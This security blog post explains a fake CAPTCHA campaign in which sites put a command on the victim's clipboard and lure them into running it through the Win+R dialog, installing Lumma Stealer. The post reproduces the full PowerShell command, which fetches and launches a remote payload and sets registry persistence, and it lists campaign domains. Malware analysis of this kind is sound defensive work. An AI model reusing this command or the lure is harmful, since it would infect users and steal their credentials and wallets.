Fake CAPTCHA Sites Trick Users to Run Malicious Code, Install Lumma Stealer

Fake CAPTCHA sites spread Lumma Stealer malware
A new malicious campaign imposes CAPTCHA human verification sites to force users into running malicious commands

New malware spreading campaign now picks up steam on the Internet, luring users to fake CAPTCHA websites. People are asked to press certain key combinations to prove they are not a robot, and get infected with malware in the end. As the analysis shows, the virus that installs in such a way is Lumma Stealer (a.k.a Lumma C2). Let’s have a deeper look at how this works and how you can protect yourself.

Lumma Stealer from a fake CAPTCHA check: Campaign overview

On September 20, quite a few analysts pointed at a rather unusual malware spreading campaign, taking place on fake CAPTCHA websites. Hackers establish this landing and create a redirect from a dodgy website. Our own observations led to a chain of pages that offer pirated movies; we met the same sites in other redirection campaigns, though with less worrying consequences. However, domains where fraudulent anti-robot checks happen are newly-established.

Fake CAPTCHA website
Example of a fake CAPTCHA website

List of fake CAPTCHA domains

URL Analysis
Stage-second-v2c.b-cdn[.]net/erbvhg/ujhs56/hyubs23/human-check-update-14.html Scan Report
Antibotx.b-cdn[.]net/captcha-verify.html Scan Report

What these landing pages do is ask for human verification by doing a sequence of key combinations. The list of demanded combos appears as the victim clicks the “I am not a robot” button, and states the following:

Press Windows Button (Win+R)
Press CTRL + V
Press Enter

The trick here is that the site pastes malicious code into clipboard upon opening. Key combinations call for the Windows Run application to start, with further pasting the command into the window and running it with PowerShell. That is what launches the malware injection process.

Malicious instructions

We extracted the command one of these sites uses, and it does not look too complicated. It contains a rather straightforward instruction: download a file from a remote server to a specific directory and run it. All the unintelligible sequences of symbols are base64-encoded parts of the command, that make it harder to detect for antiviruses. Each of these sequences correspond to addresses and paths in the system.

$BCKUinyM='https://finalsteptogo[.]com/uploads/tera14.zip'; $bpshwy7J=$env:APPDATA+'\WycT1ndu'; $EIjUwZlK=$env:APPDATA+'\yURiiySE.zip'; $avcKTKQb=$bpshwy7J+'\Set-up.exe'; if (-not (teSt-PATh $bpshwy7J)) { neW-iTeM -Path $bpshwy7J -ItemType Directory }; sTART-bItstransfEr -Source $BCKUinyM -Destination $EIjUwZlK; EXpAnD-arChiVE -Path $EIjUwZlK -DestinationPath $bpshwy7J -Force; rEmOVE-ItEM $EIjUwZlK; STArT-procEsS $avcKTKQb; neW-IteMPROPeRTY -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Ww5EqxGa' -Value $avcKTKQb -PropertyType 'String';

Consequences

As I’ve mentioned in the introduction, this campaign targets at spreading Lumma Stealer, a prolific malware that emerged in early 2024. It quickly became one of the leading malicious programs in volume of attacks, primarily targeting individuals. Typically for modern infostealers, Lumma gathers passwords to online accounts and desktop apps, paying special attention to cryptocurrency wallets. Though what makes this virus unique is the internal design, that does its best at avoiding anti-malware detection.

Such sophisticated campaigns are not a novelty for Lumma Stealer. Before, it was tucked into pirated games and software that were promoted on a hijacked YouTube channel. Its masters also seemingly try to strike on each major news happening around the gaming or software industry.

How to Protect Yourself?

As always, avoiding the threat is the best protection. Poking around on sketchy sites may look safe, but its danger will surface, sooner or later. Stopping any visits and interactions with pages that redirect you or show excessive amounts of ads will decrease the risk by orders of magnitude.

Not sure whether you can trust the site? Consider scanning it on our free online URL scanner! It goes through the entire website, checking its contents’ safety by a selection of parameters. Just 15 seconds – and you will know exactly whether the website is trustworthy.

Though, malware sometimes hits from an unexpected angle. And for this case, a reliable anti-malware software is needed. GridinSoft Anti-Malware will get you covered: its advanced network security and heuristic protection repels even the most evasive threats.

Fake CAPTCHA Sites Trick Users to Run Malicious Code, Install Lumma Stealer

By Stephanie Adlam

I write about how to make your Internet browsing comfortable and safe. The modern digital world is worth being a part of, and I want to show you how to do it properly.

Leave a comment

Your email address will not be published. Required fields are marked *